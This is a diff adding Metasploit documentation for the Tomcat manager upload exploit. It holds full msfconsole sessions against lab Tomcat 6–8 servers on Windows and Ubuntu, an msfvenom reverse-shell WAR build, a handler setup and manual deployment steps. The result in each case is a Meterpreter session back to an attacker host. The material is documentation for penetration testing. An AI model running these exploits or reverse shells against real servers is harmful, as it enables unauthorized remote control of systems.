+Manual cleanup can be done by logging into the `/manager` website.  From there, click `Undeploy` within the `Application` list to remove the malicious app from Tomcat.

--- a/documentation/modules/exploit/multi/http/tomcat_mgr_upload.md
+++ b/documentation/modules/exploit/multi/http/tomcat_mgr_upload.md
@@ -1,0 +1,421 @@
+# Documentation Format
+This documentation is slightly different from the standard module documentation due to the variation in variables/privileges/versions that can affect how exploitation happens.
+This documentation is broken down by OS, Tomcat version, then privilege to show exploitation in each variation.
+
+# tomcat_mgr_deploy
+This module is VERY similar to `exploit/multi/http/tomcat_mgr_deploy`, the main difference is this uses a `POST` HTTP request through the GUI, instead of a `PUT` HTTP request.  This module also automatically undeploys (clean up) the malicious app.
+
+## Windows (xp sp2)
+### Tomcat 6 (6.0.48)
+#### Setup
+
+1. Download and install the pre-req [Java7](http://www.oracle.com/technetwork/java/javase/downloads/jre7-downloads-1880261.html)
+2. Download and install [Tomcat6](http://apache.osuosl.org/tomcat/tomcat-6/v6.0.48/bin/apache-tomcat-6.0.48.exe)
+
+The install was default, other than adding a user during install.  No other options were changed.  The install assgined the new user the role `manager-gui`, which is Tomcat 7+ syntax.
+For this exploitation, it was changed to simply `manager`.
+
+#### Exploitation
+
+1. Edit `C:\Program Files\Apache Software Foundation\Tomcat 6.0\tomcat-users.xml` to add the following under the `<tomcat-users>` line:
+
+    ```
+    <role rolename="manager"/>
+    <user username="tomcat" password="tomcat" roles="manager"/>
+    ```
+
+2. Restart Tomcat service
+
+3. Exploit:
+
+    ```
+    msf > use exploit/multi/http/tomcat_mgr_upload
+    msf exploit(tomcat_mgr_upload) > set rport 8086
+    rport => 8086
+    msf exploit(tomcat_mgr_upload) > set HttpUsername tomcat
+    HttpUsername => tomcat
+    msf exploit(tomcat_mgr_upload) > set HttpPassword tomcat
+    HttpPassword => tomcat
+    msf exploit(tomcat_mgr_upload) > set rhost 192.168.2.108
+    rhost => 192.168.2.108
+    msf exploit(tomcat_mgr_upload) > set payload java/meterpreter/reverse_tcp 
+    payload => java/meterpreter/reverse_tcp
+    msf exploit(tomcat_mgr_upload) > check
+    [*] 192.168.2.108:8086 The target appears to be vulnerable.
+    msf exploit(tomcat_mgr_upload) > set lhost 192.168.2.117
+    lhost => 192.168.2.117
+    msf exploit(tomcat_mgr_upload) > exploit
+    
+    [*] Started reverse TCP handler on 192.168.2.117:4444 
+    [*] Retrieving session ID and CSRF token...
+    [*] Uploading and deploying ZyCAK8R6vkZdD7d8n5fiLOpXEfPsq7...
+    [*] Executing ZyCAK8R6vkZdD7d8n5fiLOpXEfPsq7...
+    [*] Undeploying ZyCAK8R6vkZdD7d8n5fiLOpXEfPsq7 ...
+    [*] Sending stage (49409 bytes) to 192.168.2.108
+    [*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.108:3387) at 2017-01-15 19:18:14 -0500
+    
+    meterpreter > sysinfo
+    Computer    : winxp
+    OS          : Windows XP 5.1 (x86)
+    Meterpreter : java/windows
+    ```
+
+### Tomcat 7 (7.0.73)
+Of note, as of Tomcat 7, the permission role `manager` has been divided into several sub-roles.  The `manager-gui` permission is required for this exploit.
+
+#### Setup
+
+1. Download and install the pre-req [Java7](http://www.oracle.com/technetwork/java/javase/downloads/jre7-downloads-1880261.html)
+2. Download and install [Tomcat7](http://apache.osuosl.org/tomcat/tomcat-7/v7.0.73/bin/apache-tomcat-7.0.73.exe)
+
+The install was default, other than adding a user during install.  No other options were changed.
+
+#### Exploitation
+
+1. If a user was not defined at install, you will need to add a `manager-gui` permission user.  Edit `C:\Program Files\Apache Software Foundation\Tomcat 7.0\tomcat-users.xml` to add the following under the `<tomcat-users>` line:
+
+    ```
+    <role rolename="manager-gui"/>
+    <user username="tomcat" password="tomcat" roles="manager-gui"/>
+    ```
+
+2. Restart the service if a user was added/changed
+
+3. Exploitation:
+
+    ```
+    msf > use exploit/multi/http/tomcat_mgr_upload
+    msf exploit(tomcat_mgr_upload) > set HttpUsername tomcat
+    HttpUsername => tomcat
+    msf exploit(tomcat_mgr_upload) > set HttpPassword tomcat
+    HttpPassword => tomcat
+    msf exploit(tomcat_mgr_upload) > set rhost 192.168.2.108
+    rhost => 192.168.2.108
+    msf exploit(tomcat_mgr_upload) > set payload java/meterpreter/reverse_tcp 
+    payload => java/meterpreter/reverse_tcp
+    msf exploit(tomcat_mgr_upload) > set lhost 192.168.2.117
+    lhost => 192.168.2.117
+    msf exploit(tomcat_mgr_upload) > set rport 8087
+    rport => 8087
+    msf exploit(tomcat_mgr_upload) > check
+    [*] 192.168.2.108:8087 The target appears to be vulnerable.
+    msf exploit(tomcat_mgr_upload) > exploit
+    
+    [*] Started reverse TCP handler on 192.168.2.117:4444 
+    [*] Retrieving session ID and CSRF token...
+    [*] Uploading and deploying vm5yNsROSQ...
+    [*] Executing vm5yNsROSQ...
+    [*] Undeploying vm5yNsROSQ ...
+    [*] Sending stage (49409 bytes) to 192.168.2.108
+    [*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.108:3427) at 2017-01-15 19:25:22 -0500
+    
+    meterpreter > sysinfo
+    Computer    : winxp
+    OS          : Windows XP 5.1 (x86)
+    Meterpreter : java/windows
+    ```
+
+### Tomcat 8 (8.0.39)
+Of note, as of Tomcat 7, the permission role `manager` has been divided into several sub-roles.  The `manager-gui` permission is required for this exploit.
+
+#### Setup
+
+1. Download and install the pre-req [Java7](http://www.oracle.com/technetwork/java/javase/downloads/jre7-downloads-1880261.html)
+2. Download and install [Tomcat8](http://apache.osuosl.org/tomcat/tomcat-8/v8.0.39/bin/apache-tomcat-8.0.39.exe)
+
+The install was default, other than adding a user during install.  No other options were changed.
+
+#### Exploitation
+
+1. If a user was not defined at install, you will need to add a `manager-gui` permission user.  Edit `C:\Program Files\Apache Software Foundation\Tomcat 8.0\tomcat-users.xml` to add the following under the `<tomcat-users` line:
+
+    ```
+    <role rolename="manager-gui"/>
+    <user username="tomcat" password="tomcat" roles="manager-gui"/>
+    ```
+
+2. Restart the service if a user was added/changed
+
+3. Exploitation:
+
+    ```
+    msf > use exploit/multi/http/tomcat_mgr_upload
+    msf exploit(tomcat_mgr_upload) > set rport 8088
+    rport => 8088
+    msf exploit(tomcat_mgr_upload) > set HttpUsername tomcat
+    HttpUsername => tomcat
+    msf exploit(tomcat_mgr_upload) > set HttpPassword tomcat
+    HttpPassword => tomcat
+    msf exploit(tomcat_mgr_upload) > set rhost 192.168.2.108
+    rhost => 192.168.2.108
+    msf exploit(tomcat_mgr_upload) > set payload java/meterpreter/reverse_tcp 
+    payload => java/meterpreter/reverse_tcp
+    msf exploit(tomcat_mgr_upload) > set lhost 192.168.2.117
+    lhost => 192.168.2.117
+    msf exploit(tomcat_mgr_upload) > set verbose true
+    verbose => true
+    msf exploit(tomcat_mgr_upload) > check
+    
+    [*] Tomcat Manager found running on win platform and x86 architecture
+    [!] No active DB -- Credential data will not be saved!
+    [*] 192.168.2.108:8088 The target appears to be vulnerable.
+    msf exploit(tomcat_mgr_upload) > exploit
+    
+    [*] Started reverse TCP handler on 192.168.2.117:4444 
+    [*] Retrieving session ID and CSRF token...
+    [*] Finding CSRF token...
+    [*] Uploading and deploying AiV6YUyTkEpIK5G87r0gmdf8fFH...
+    [*] Uploading 6094 bytes as AiV6YUyTkEpIK5G87r0gmdf8fFH.war ...
+    [*] Executing AiV6YUyTkEpIK5G87r0gmdf8fFH...
+    [*] Executing /AiV6YUyTkEpIK5G87r0gmdf8fFH/u9TOPpZzy6dj21L.jsp...
+    [*] Finding CSRF token...
+    [*] Undeploying AiV6YUyTkEpIK5G87r0gmdf8fFH ...
+    [*] Sending stage (49409 bytes) to 192.168.2.108
+    [*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.108:3508) at 2017-01-15 19:38:29 -0500
+    
+    meterpreter > sysinfo
+    Computer    : winxp
+    OS          : Windows XP 5.1 (x86)
+    Meterpreter : java/windows
+    ```
+
+## Linux
+
+### Tomcat6 (6.0.39) - Ubuntu server 14.04 64bit
+
+#### Setup
+
+1. Install Tomcat and dependencies: `sudo apt-get install tomcat6 tomcat6-admin`
+
+#### Exploit
+
+1. Edit `/etc/tomcat6/tomcat-users.xml` to add the following:
+
+    ```
+    <role rolename="manager"/>
+    <user username="tomcat" password="tomcat" roles="manager"/>
+    ```
+
+2. Restart the service if a user was added/changed: `sudo service tomcat6 restart`
+
+3. Exploit:
+
+    ```
+    msf > use exploit/multi/http/tomcat_mgr_upload
+    msf exploit(tomcat_mgr_upload) > set HttpUsername tomcat
+    HttpUsername => tomcat
+    msf exploit(tomcat_mgr_upload) > set HttpPassword tomcat
+    HttpPassword => tomcat
+    msf exploit(tomcat_mgr_upload) > set payload java/meterpreter/reverse_tcp 
+    payload => java/meterpreter/reverse_tcp
+    msf exploit(tomcat_mgr_upload) > set verbose true
+    verbose => true
+    msf exploit(tomcat_mgr_upload) > set lhost 192.168.2.117
+    lhost => 192.168.2.117
+    msf exploit(tomcat_mgr_upload) > set rhost 192.168.2.156
+    rhost => 192.168.2.156
+    msf exploit(tomcat_mgr_upload) > set rport 8080
+    rport => 8080
+    msf exploit(tomcat_mgr_upload) > check
+    
+    [*] Tomcat Manager found running on linux platform and x64 architecture
+    [!] No active DB -- Credential data will not be saved!
+    [*] 192.168.2.156:8080 The target appears to be vulnerable.
+    msf exploit(tomcat_mgr_upload) > exploit
+    
+    [*] Started reverse TCP handler on 192.168.2.117:4444 
+    [*] Retrieving session ID and CSRF token...
+    [*] Finding CSRF token...
+    [*] Uploading and deploying biytXntmq4Dtie0ulwwT...
+    [*] Uploading 6082 bytes as biytXntmq4Dtie0ulwwT.war ...
+    [!] No active DB -- Credential data will not be saved!
+    [*] Executing biytXntmq4Dtie0ulwwT...
+    [*] Executing /biytXntmq4Dtie0ulwwT/rmslIdWH4LwPZlMkHipzUah.jsp...
+    [*] Finding CSRF token...
+    [*] Undeploying biytXntmq4Dtie0ulwwT ...
+    [*] Sending stage (49409 bytes) to 192.168.2.156
+    [*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.156:55062) at 2017-01-15 20:29:42 -0500
+    
+    meterpreter > sysinfo
+    Computer    : Ubuntu14
+    OS          : Linux 4.2.0-27-generic (amd64)
+    Meterpreter : java/linux
+    ```
+
+### Tomcat7 (7.0.68) - Ubuntu server 16.04 64bit
+Of note, as of Tomcat 7, the permission role `manager` has been divided into several sub-roles.  Each sub role the user has will change which `path` variable for exploitation.
+
+#### Setup
+1. Install Tomcat and dependencies: `apt-get install tomcat7 tomcat7-admin`
+
+#### text/script Interface Exploitation
+
+1. Edit `/etc/tomcat7/tomcat-users.xml` to add:
+
+    ```
+    <role rolename="manager-gui"/>
+    <user username="tomcat" password="tomcat" roles="manager-gui"/>
+    ```
+
+2. Restart the service if a user was added/changed: `sudo service tomcat7 restart`
+
+3. Exploit:
+
+    ```
+    msf > use exploit/multi/http/tomcat_mgr_upload
+    msf exploit(tomcat_mgr_upload) > set HttpUsername tomcat
+    HttpUsername => tomcat
+    msf exploit(tomcat_mgr_upload) > set HttpPassword tomcat
+    HttpPassword => tomcat
+    msf exploit(tomcat_mgr_upload) > set payload java/meterpreter/reverse_tcp 
+    payload => java/meterpreter/reverse_tcp
+    msf exploit(tomcat_mgr_upload) > set lhost 192.168.2.117
+    lhost => 192.168.2.117
+    msf exploit(tomcat_mgr_upload) > set verbose true
+    verbose => true
+    msf exploit(tomcat_mgr_upload) > set rhost 192.168.2.118
+    rhost => 192.168.2.118
+    msf exploit(tomcat_mgr_upload) > set rport 8087
+    rport => 8087
+    msf exploit(tomcat_mgr_upload) > check
+    
+    [*] Tomcat Manager found running on linux platform and x64 architecture
+    [!] No active DB -- Credential data will not be saved!
+    [*] 192.168.2.118:8087 The target appears to be vulnerable.
+    msf exploit(tomcat_mgr_upload) > exploit
+    
+    [*] Started reverse TCP handler on 192.168.2.117:4444 
+    [*] Retrieving session ID and CSRF token...
+    [*] Finding CSRF token...
+    [*] Uploading and deploying QyjbnIqnn23FOe...
+    [*] Uploading 6077 bytes as QyjbnIqnn23FOe.war ...
+    [*] Executing QyjbnIqnn23FOe...
+    [*] Executing /QyjbnIqnn23FOe/2NFgGA5fk1.jsp...
+    [*] Finding CSRF token...
+    [*] Undeploying QyjbnIqnn23FOe ...
+    [*] Sending stage (49409 bytes) to 192.168.2.118
+    [*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.118:33808) at 2017-01-15 20:04:21 -0500
+    
+    meterpreter > sysinfo
+    Computer    : tomcat
+    OS          : Linux 4.4.0-59-generic (amd64)
+    Meterpreter : java/linux
+    ```
+
+### Tomcat8 (8.0.32) - Ubuntu server 16.04 64bit
+Of note, as of 7, the permission role 'manager' has been divided into several sub-roles.  The `manager-gui` permission is required for this exploit.
+
+#### Setup
+
+1. `apt-get install tomcat8 tomcat8-admin`
+
+#### text/script Interface Exploitation
+
+1. Edit `/etc/tomcat8/tomcat-users.xml` to add:
+
+    ```
+    <role rolename="manager-gui"/>
+    <user username="tomcat" password="tomcat" roles="manager-gui"/>
+    ```
+
+2. Restart the service if a user was added/changed: `sudo service tomcat8 restart`
+
+3. Exploit:
+
+    ```
+    msf > use exploit/multi/http/tomcat_mgr_upload
+    msf exploit(tomcat_mgr_upload) > set HttpUsername tomcat
+    HttpUsername => tomcat
+    msf exploit(tomcat_mgr_upload) > set HttpPassword tomcat
+    HttpPassword => tomcat
+    msf exploit(tomcat_mgr_upload) > set payload java/meterpreter/reverse_tcp 
+    payload => java/meterpreter/reverse_tcp
+    msf exploit(tomcat_mgr_upload) > set lhost 192.168.2.117
+    lhost => 192.168.2.117
+    msf exploit(tomcat_mgr_upload) > set verbose true
+    verbose => true
+    msf exploit(tomcat_mgr_upload) > set rhost 192.168.2.118
+    rhost => 192.168.2.118
+    msf exploit(tomcat_mgr_upload) > set rport 8088
+    rport => 8088
+    msf exploit(tomcat_mgr_upload) > check
+    
+    [*] Tomcat Manager found running on linux platform and x64 architecture
+    [*] 192.168.2.118:8088 The target appears to be vulnerable.
+    msf exploit(tomcat_mgr_upload) > exploit
+    
+    [*] Started reverse TCP handler on 192.168.2.117:4444 
+    [*] Retrieving session ID and CSRF token...
+    [*] Finding CSRF token...
+    [*] Uploading and deploying Bjf01M65XUROXL36wmIc85OmtY...
+    [*] Uploading 6092 bytes as Bjf01M65XUROXL36wmIc85OmtY.war ...
+    [*] Executing Bjf01M65XUROXL36wmIc85OmtY...
+    [*] Executing /Bjf01M65XUROXL36wmIc85OmtY/UbPmEhI1wkAf8Yj1rTohvPQWPIADy5.jsp...
+    [*] Finding CSRF token...
+    [*] Undeploying Bjf01M65XUROXL36wmIc85OmtY ...
+    [*] Sending stage (49409 bytes) to 192.168.2.118
+    [*] Meterpreter session 3 opened (192.168.2.117:4444 -> 192.168.2.118:33814) at 2017-01-15 20:08:13 -0500
+    
+    meterpreter > sysinfo
+    Computer    : tomcat
+    OS          : Linux 4.4.0-59-generic (amd64)
+    Meterpreter : java/linux
+    ```
+
+# Manual Exploitation
+
+## Create payload
+This was performed on Windows XP with the following permissions as the user that was used to login:
+
+* Tomcat 6.0.48: `manager`
+* Tomcat 7.0.73: `manager-gui`
+* Tomcat 8.0.39: `manager-gui`
+
+```
+/metasploit-framework# msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.2.117 LPORT=7777 -f war -o meterp.war
+Payload size: 6072 bytes
+Final size of war file: 6072 bytes
+Saved as: meterp.war
+```
+
+## Setup Handler
+
+```
+msf > use exploit/multi/handler 
+msf exploit(handler) > set payload java/meterpreter/reverse_tcp 
+payload => java/meterpreter/reverse_tcp
+msf exploit(handler) > set lhost 192.168.2.117
+lhost => 192.168.2.117
+msf exploit(handler) > set lport 7777
+lport => 7777
+msf exploit(handler) > exploit
+
+[*] Started reverse TCP handler on 192.168.2.117:7777 
+[*] Starting the payload handler...
+```
+
+## Deploy
+
+1. With a web browser, browse to `http://<ip>:<port>/manager/html`
+2. Enter credentials (no default)
+3. Under `Deploy` > `WAR file to deploy`, click browse to select `meterp.war`, click `Deploy`
+4. `meterp` should now be listed under `Applications`, meaning it was successfully deployed.
+5. Either click the link for `/meterp` or browse to `http://<ip>:<port>/meterp/`
+
+## Callback
+After browsing to that page, code execution will happen, and your callback will hit.
+
+```
+[*] Starting the payload handler...
+[*] Sending stage (49409 bytes) to 192.168.2.108
+[*] Meterpreter session 1 opened (192.168.2.117:7777 -> 192.168.2.108:1704) at 2017-01-14 14:53:37 -0500
+
+meterpreter > sysinfo
+Computer    : winxp
+OS          : Windows XP 5.1 (x86)
+Meterpreter : java/windows
+```
+
+## Manual Cleanup
+
+This will NOT remove the meterpreter from Tomcat, click `Undeploy` within the `Application` list to remove `meterp` from Tomcat.


### PR DESCRIPTION
Adds docs for `exploit/multi/http/tomcat_mgr_deploy ` and `exploit/multi/http/tomcat_mgr_upload `

Of note, I always deployed tomcat to 808# where # was the version number, so Tomcat6 was 8086, 7 was 8087 etc.  Should make docs easier to ready through.

## Verification

- [x] Start `msfconsole`
- [x] `use exploit/multi/http/tomcat_mgr_deploy`
- [x] `info -d`
- [x] **Verify** spellings, flow makes sense, etc.  
- [x] `use exploit/multi/http/tomcat_mgr_upload`
- [x] `info -d`
- [x] **Verify** spellings, flow makes sense, etc.  

